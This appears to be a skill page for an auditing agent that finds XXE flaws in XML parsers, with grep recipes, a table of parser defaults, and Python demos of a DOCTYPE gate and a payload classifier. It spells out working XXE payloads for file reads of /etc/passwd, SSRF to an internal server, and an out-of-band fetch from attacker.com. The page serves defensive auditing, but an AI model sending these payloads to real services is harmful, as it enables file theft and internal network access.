From find-cve-agent
Detects XXE vulnerabilities in XML parsers processing untrusted input across JavaScript, TypeScript, Python, Go, Ruby, PHP, Java. Guides auditing configurations, defaults, and input flows for file read/SSRF risks.
Slash command: /find-cve-agent:xxe
Summary shown in the skill listing (used to decide when to auto-load this skill):
Audit XML processing endpoints, SOAP services, document importers (DOCX/XLSX/SVG), and any code that parses XML from untrusted sources.
XXE: an external entity resolves a URI (file://, http://) -- the parser reads files or makes HTTP requests. Both can exist in the same parser, but they are different vulnerabilities.
Locate every parser entry point first; each hit is a candidate sink for untrusted XML:

```bash
# JavaScript
grep -rn "DOMParser\|XMLParser\|xml2js\|libxmljs\|xmldom\|sax\|saxes" .
# Python
grep -rn "xml\.etree\|lxml\|minidom\|xml\.sax\|defusedxml\|xmltodict" .
# Go
grep -rn "xml\.Decoder\|xml\.Unmarshal\|encoding/xml" .
# Java
grep -rn "DocumentBuilder\|SAXParser\|XMLReader\|TransformerFactory\|SchemaFactory" .
# PHP
grep -rn "simplexml\|DOMDocument\|XMLReader\|xml_parse" .
# Ruby
grep -rn "Nokogiri\|REXML\|Ox\|LibXML" .
```
Then look for explicit parser configuration. A hit here is either hardening (disallow-doctype-decl, nonet) or deliberate weakening (noent, resolve_entities=True, feature_external_ges); read each one in context:

```bash
# Java JAXP features
grep -rn "FEATURE_SECURE_PROCESSING\|FEATURE_EXTERNAL_ENTITIES\|FEATURE_GENERAL_ENTITIES" .
# lxml / libxml2 / Nokogiri option names
grep -rn "resolve_entities\|external_entities\|load_external\|noent\|nonet" .
# Xerces feature URIs
grep -rn "disallow-doctype-decl\|external-general-entities\|external-parameter-entities" .
# Comments and helper names that mention the problem at all
grep -rn "XXE\|external.*entity\|doctype" .
```
Defaults differ by parser and by version, so confirm the installed version before marking anything SAFE. UNSAFE rows need a fix in code; CHECK rows need the relevant flag confirmed:

| Parser | External entities by default | Safe? |
|---|---|---|
| xml.etree (Python) | Not resolved; a reference to an external entity raises ParseError | SAFE |
| xml.sax / xml.dom.pulldom (Python) | Off since Python 3.7.1 (feature_external_ges defaults to False); on in older interpreters or wherever code sets it to True | CHECK |
| xml.dom.minidom (Python) | Not resolved; the reference is left unexpanded | SAFE |
| lxml (Python) | lxml 4.x resolves entities by default (resolve_entities=True), so file:// entities resolve; network fetches are blocked by no_network=True. Pass resolve_entities=False explicitly | CHECK |
| defusedxml (Python) | Forbidden; DTDs and entity references raise | SAFE |
| encoding/xml (Go) | No external entity support | SAFE |
| Nokogiri (Ruby) | Off (default options set NONET and not NOENT); only unsafe if code passes noent/dtdload | SAFE |
| REXML (Ruby) | Verify against the installed version; entity expansion is bounded by REXML::Security.entity_expansion_limit | CHECK |
| libxml2 (C) | Off unless XML_PARSE_NOENT (substitution) or XML_PARSE_DTDLOAD (external DTD); XML_PARSE_NONET blocks network access | CHECK |
| Java DocumentBuilder / SAXParser / XMLReader | Enabled; set disallow-doctype-decl to true, or set both external-general-entities and external-parameter-entities to false | UNSAFE |
| PHP simplexml / DOMDocument | Not substituted unless LIBXML_NOENT is passed; PHP 8.0+ also disables external entity loading by default | CHECK |
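As an added example (not part of the find-cve-agent skill), the following Python script runs the file-read payload from this page through the standard-library parsers to show the defaults in the table above: xml.sax with feature_external_ges turned on leaks the file, the 3.7.1+ default leaks nothing, xml.etree raises ParseError, and a DOCTYPE gate built on expat's declaration callback rejects the document before any parser sees it. The secret file, its contents and the function names (file_read_payload, parse_with_sax, safe_fromstring, demo) are constructed for the demo.

```python
import io
import os
import pathlib
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
from xml.parsers import expat
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed secret; demo() writes it to a temp file that the payload then targets.
SECRET = "s3cr3t-token"


def file_read_payload(path: str) -> bytes:
    """Classic file-read XXE: an external general entity pointing at a local file."""
    uri = pathlib.Path(path).resolve().as_uri()  # file:///...
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{uri}">]>\n'
        "<root>&xxe;</root>"
    ).encode()


class _TextCollector(ContentHandler):
    """Collects character data so we can see whether the entity was expanded."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_with_sax(xml_bytes: bytes, resolve_external: bool) -> str:
    """xml.sax with feature_external_ges set explicitly. Since Python 3.7.1 the
    default is False; older interpreters, or code that turns it on, leak the file."""
    parser = xml.sax.make_parser()
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def etree_rejects(xml_bytes: bytes) -> bool:
    """xml.etree never resolves external entities: referencing one is a ParseError."""
    try:
        ET.fromstring(xml_bytes)
    except ET.ParseError:
        return True
    return False


def has_doctype(xml_bytes: bytes) -> bool:
    """Detect a DOCTYPE via expat's declaration callback rather than string matching,
    so '<!DOCTYPE' inside a comment or CDATA section is not a false positive.
    expat with no entity handlers set fetches nothing, so this pass is safe on untrusted input."""
    seen = []
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = lambda name, sysid, pubid, has_internal: seen.append(name)
    try:
        p.Parse(xml_bytes, True)
    except expat.ExpatError:
        pass  # malformed input fails again in the real parse; we only ask whether a DOCTYPE was seen
    return bool(seen)


def safe_fromstring(xml_bytes: bytes) -> ET.Element:
    """Reject any document carrying a DTD, then parse (same idea as defusedxml's forbid_dtd)."""
    if has_doctype(xml_bytes):
        raise ValueError("DOCTYPE/DTD not allowed in untrusted XML")
    return ET.fromstring(xml_bytes)


def demo() -> dict:
    """Write the secret to a temp file, aim the payload at it, run it through each parser."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(SECRET)
    try:
        payload = file_read_payload(f.name)
        try:
            safe_fromstring(payload)
            gate_blocked = False
        except ValueError:
            gate_blocked = True
        return {
            "sax_external_ges_on": parse_with_sax(payload, resolve_external=True),
            "sax_external_ges_off": parse_with_sax(payload, resolve_external=False),
            "etree_raises": etree_rejects(payload),
            "gate_blocked": gate_blocked,
            "benign_still_parses": safe_fromstring(b"<root>ok</root>").text,
        }
    finally:
        os.unlink(f.name)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The gate runs expat twice over the input (once for the DOCTYPE check, once for the real parse) because the C-accelerated ElementTree.XMLParser does not expose its expat object; for large documents, or if you want the doc rejected at the first byte of the DTD, install the same StartDoctypeDeclHandler on the parser that does the real work instead.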
Does untrusted XML reach the parser? Common sources:
File read (external general entity resolved to a local path):

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
```

SSRF (same entity, but the parser makes an HTTP request on the server's behalf):

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server/api/secret">
]>
<root>&xxe;</root>
```

Blind / out-of-band (an external parameter entity pulls in a remote DTD; the DTD, not the document, carries the exfiltration logic, so nothing needs to be reflected in the response):

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root>test</root>
```
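To triage these payload shapes without resolving anything, here is an added Python example (not the skill's own code) that uses expat's entity-declaration and DOCTYPE callbacks to report which DTD feature a document relies on. It goes one step beyond the three payloads above by also flagging an external DTD referenced directly on the DOCTYPE line, which parsers with DTD loading enabled will fetch. The sample documents are the page's three payloads plus constructed benign ones; inspect_dtd, classify and scheme_of are names chosen here.

```python
from xml.parsers import expat

# Sample inputs: the three payloads from this page plus constructed controls.
FILE_READ = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""

SSRF = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server/api/secret">
]>
<root>&xxe;</root>"""

OOB_PARAMETER = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root>test</root>"""

# Constructed: external DTD on the DOCTYPE line itself (no ENTITY declaration needed).
EXTERNAL_DTD = b'<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd"><root/>'

# Constructed: internal entity only, no external access.
BENIGN_INTERNAL = b"""<!DOCTYPE foo [
<!ENTITY greet "hello">
]>
<root>&greet;</root>"""

NO_DTD = b"<root>plain</root>"


def inspect_dtd(xml_bytes: bytes) -> dict:
    """Collect the DOCTYPE's system identifier and every <!ENTITY> declaration.
    A bare expat parser with no ExternalEntityRefHandler and parameter-entity
    parsing left at its default (never) does not fetch anything, so this is
    safe to run on untrusted input."""
    info = {"doctype_system_id": None, "entities": {}}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        info["doctype_system_id"] = system_id

    def on_entity(name, is_param, value, base, system_id, public_id, notation_name):
        info["entities"][name] = {
            "parameter": bool(is_param),
            "system_id": system_id,      # None for internal entities
            "internal_value": value,     # None for external entities
        }

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError:
        pass  # best effort: whatever was declared before the error is still reported
    return info


def scheme_of(uri: str) -> str:
    return uri.split(":", 1)[0] if ":" in uri else "relative"


def classify(xml_bytes: bytes) -> str:
    """Name the most dangerous DTD feature the document uses."""
    info = inspect_dtd(xml_bytes)
    if info["doctype_system_id"]:
        return f"external DTD ({scheme_of(info['doctype_system_id'])})"
    entities = info["entities"]
    external = {n: e for n, e in entities.items() if e["system_id"] is not None}
    if any(e["parameter"] for e in external.values()):
        return "external parameter entity"   # OOB / blind XXE pattern
    if external:
        first = next(iter(external.values()))
        return f"external general entity ({scheme_of(first['system_id'])})"  # file read or SSRF
    if entities:
        return "internal entities only"      # no external access; still subject to expansion DoS
    return "no entity declarations"


if __name__ == "__main__":
    for label, doc in [("file read", FILE_READ), ("ssrf", SSRF), ("oob", OOB_PARAMETER),
                       ("external dtd", EXTERNAL_DTD), ("benign", BENIGN_INTERNAL), ("no dtd", NO_DTD)]:
        print(f"{label:13s} -> {classify(doc)}")
```

A reasonable policy for an untrusted-input gate is to reject everything except "no entity declarations"; the finer labels are useful when reviewing captured requests or deciding which of the page's payload families actually reached a given endpoint.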
npx claudepluginhub byamb4/find-cve-agent